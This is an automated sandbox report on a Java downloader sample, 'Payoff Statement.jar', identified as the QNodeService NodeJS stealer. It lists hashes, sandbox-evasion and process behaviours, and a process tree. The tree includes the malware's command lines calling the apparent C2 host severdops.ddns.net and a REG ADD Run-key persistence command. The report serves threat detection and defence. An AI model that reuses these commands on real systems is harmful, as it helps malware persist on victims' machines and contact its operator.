Analysis
  max time kernel:   35s
  max time network:  125s
  platform:          windows10_x64
  resource:          win10
  submitted:         16-10-2020 10:41
Static task
  static1

Behavioral task
  behavioral1
  Sample:    Payoff Statement.jar
  Resource:  win7v200722 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task
  behavioral2
  Sample:    Payoff Statement.jar
  Resource:  win10 (windows10_x64)
  0 signatures, 0 seconds
General
  Target:  Payoff Statement.jar
  Size:    107KB
  MD5:     71747772db1e1a0d72cc715270b1d81f
  SHA1:    10e88b56fd0c2b37ff3c570bd15e5b1f4ca35546
  SHA256:  ca387dd7da00ab25ce6ba103baca69def6babbc0dc8ccfa2fbc901a37a7de364
  SHA512:  10b37a12cbd0a0efa370cdb9b051b68a042471bde62b2af1221ef759249c352ed6afee522a24ead2b1cfcb48f74bb36a43c4ac0a2022da27214577ac1e9b7e01
  Score:   10/10
Malware Config

Signatures

QNodeService
  Trojan/stealer written in NodeJS and spread via Java downloader.

Executes dropped EXE (3 IoCs)
  pid   Process
  3508  node.exe
  3612  node.exe
  3532  node.exe
Adds Run key to start application (2 TTPs, 2 IoCs)
  description:  Key created
  ioc:          \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  Process:      reg.exe

  description:  Set value (str)
  ioc:          \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\329d06e0-5011-4c3e-94a5-ca3241ca99a9 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\""
  Process:      reg.exe
JavaScript code in executable (3 IoCs)
  resource                                      yara_rule
  behavioral2/files/0x000100000001ada5-164.dat  js
  behavioral2/files/0x000100000001ada5-169.dat  js
  behavioral2/files/0x000100000001ada5-173.dat  js
Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  23    wtfismyip.com
  24    wtfismyip.com
Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description        ioc                                                                                   Process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                 node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  node.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1                      node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz                 node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString  node.exe
Suspicious behavior: EnumeratesProcesses (18 IoCs)
  pid   Process   entries
  3508  node.exe  4
  3612  node.exe  4
  3532  node.exe  10
Suspicious use of WriteProcessMemory (12 IoCs; each row was recorded twice)
  description                        pid   Process    procid_target
  PID 980 wrote to memory of 2252    980   java.exe   76
  PID 2252 wrote to memory of 3508   2252  javaw.exe  78
  PID 3508 wrote to memory of 3612   3508  node.exe   80
  PID 3612 wrote to memory of 3532   3612  node.exe   81
  PID 3532 wrote to memory of 3920   3532  node.exe   83
  PID 3920 wrote to memory of 3972   3920  cmd.exe    84
Processes (process tree; the number is the depth level, children are indented under their parent)

1  C:\ProgramData\Oracle\Java\javapath\java.exe
   cmdline: java -jar "C:\Users\Admin\AppData\Local\Temp\Payoff Statement.jar"
   PID: 980
   - Suspicious use of WriteProcessMemory

   2  C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      cmdline: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\b617a428.tmp
      PID: 2252
      - Suspicious use of WriteProcessMemory

      3  C:\Users\Admin\node-v14.12.0-win-x64\node.exe
         cmdline: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain severdops.ddns.net
         PID: 3508
         - Executes dropped EXE
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of WriteProcessMemory

         4  C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            cmdline: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_ygdoui\boot.js --hub-domain severdops.ddns.net
            PID: 3612
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory

            5  C:\Users\Admin\node-v14.12.0-win-x64\node.exe
               cmdline: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_ygdoui\boot.js --hub-domain severdops.ddns.net
               PID: 3532
               - Executes dropped EXE
               - Checks processor information in registry
               - Suspicious behavior: EnumeratesProcesses
               - Suspicious use of WriteProcessMemory

               6  C:\Windows\system32\cmd.exe
                  cmdline: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "329d06e0-5011-4c3e-94a5-ca3241ca99a9" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
                  PID: 3920
                  - Suspicious use of WriteProcessMemory

                  7  C:\Windows\system32\reg.exe
                     cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "329d06e0-5011-4c3e-94a5-ca3241ca99a9" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                     PID: 3972
                     - Adds Run key to start application